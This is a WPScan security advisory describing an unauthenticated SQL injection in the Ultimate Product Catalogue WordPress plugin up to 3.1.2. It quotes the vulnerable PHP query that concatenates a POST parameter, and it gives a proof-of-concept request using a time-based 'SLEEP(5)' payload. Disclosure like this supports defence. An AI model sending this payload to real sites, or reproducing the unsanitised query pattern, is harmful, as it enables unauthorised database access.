Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Unauthenticated SQL injection in ajax call when the plugin is counting the times a product is being seen by the web visitors. The vulnerable POST parameter is "Item_ID".
 
Vulnerable code:
 
In file Functions/Process_Ajax.php line 67:

[...]
$Item_ID = $_POST['Item_ID'];
$Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name WHERE Item_ID=". $Item_ID);
[...]
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <wordpress host>
[...]
Cookie: wordpress_f305[...]
 
Item_ID=2 AND SLEEP(5)&action=record_view

Affects

Plugin ultimate-product-catalogue
fixed in version 3.1.3

References

EXPLOITDB 36823
URL http://www.estacion-informatica.com/2015/04/liberando-algunas-vulnerabilidades.html

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Felipe Molina
Submitter Twitter felmoltor
Views 98
Verified No
WPVDB ID 7946

Timeline

Publicly Published 2015-04-23 (over 1 year ago)
Added 2015-04-27 (over 1 year ago)
Last Updated 2016-07-29 (4 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.